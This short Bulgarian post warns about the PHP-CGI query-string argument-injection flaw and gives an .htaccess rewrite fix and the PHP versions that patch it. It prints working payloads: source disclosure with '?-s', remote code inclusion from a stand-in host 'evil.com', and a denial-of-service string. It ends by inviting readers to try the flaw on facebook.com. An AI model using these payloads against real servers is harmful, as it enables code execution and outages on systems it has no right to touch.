Facebook CGI exploit
С днешна дата се появи много сериозен експлойт за CGI, който позволява изпълняването на команди директо през урл адреса.
Например имате сайт на локалната си машина, който използва mod_cgi или е през FastCGI то ако въведете параметъра “?-s” то ще видите кода на вашия файл. Пример: http://localhost/index.php?-s. Чрез тази уязвимост можете да изпълните дори отдалечено файл с команди, ако вкарате самите команди в ини фаил. Пример: /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://evil.com/code.txt%20-n . Друго изпълнение което може да навреди на сайта ви е DoS атака. Пример: ?-T+100000.
Решението на този проблем е чрез .htaccess
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
В официалния сайт на php – php.net е обявено че с ъпдейт към PHP 5.3.12 или PHP 5.4.2 проблема се оправя но това може да доведе до спиране на функциите на сайта ви, тъй като има много деприкейтид функции.
А сега пробвайте с https://www.facebook.com/?-s
Поздрави
HM